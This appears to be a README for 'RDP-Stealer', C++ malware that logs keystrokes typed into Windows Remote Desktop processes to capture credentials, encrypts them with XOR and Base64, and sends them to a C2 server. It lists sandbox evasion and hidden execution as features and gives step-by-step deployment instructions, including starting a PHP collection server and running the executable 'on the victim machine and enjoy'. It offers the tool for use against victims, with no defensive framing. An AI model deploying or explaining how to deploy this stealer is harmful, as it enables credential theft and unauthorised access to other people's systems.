RDP-Stealer is C++ malware that targets Remote Desktop Protocol (RDP) processes. It acts as a keystroke logger, capturing credentials provided by users in RDP and sending back encrypted data to a C2 server.
- Basic Sandbox Evasion
- Executes without a visible window (in the background).
- Captures keystrokes in RDP processes using the context of
mstsc.exe
andCredentialUIBroker.exe
. - Encrypts the captured data using
XOR
andBASE64
. - Sends data to a C2 server.
- Create a recvData folder in the directory.
- Change
SECRET_KEY
fromRDPStealer.cpp
andserver.php
. - Before running the
RDPStealer.exe
on the victim machine, first run theserver.php
.
php -S 0.0.0.0:8000
- Run the
RDPStealer.exe
on the victim machine and enjoy :).
.\RDPStealer.exe
Note
⚠️
- It is better to use an
HTTPS server
instead of anHTTP server
. - The program will execute in the background and will not display any windows, as it is shown in the video below.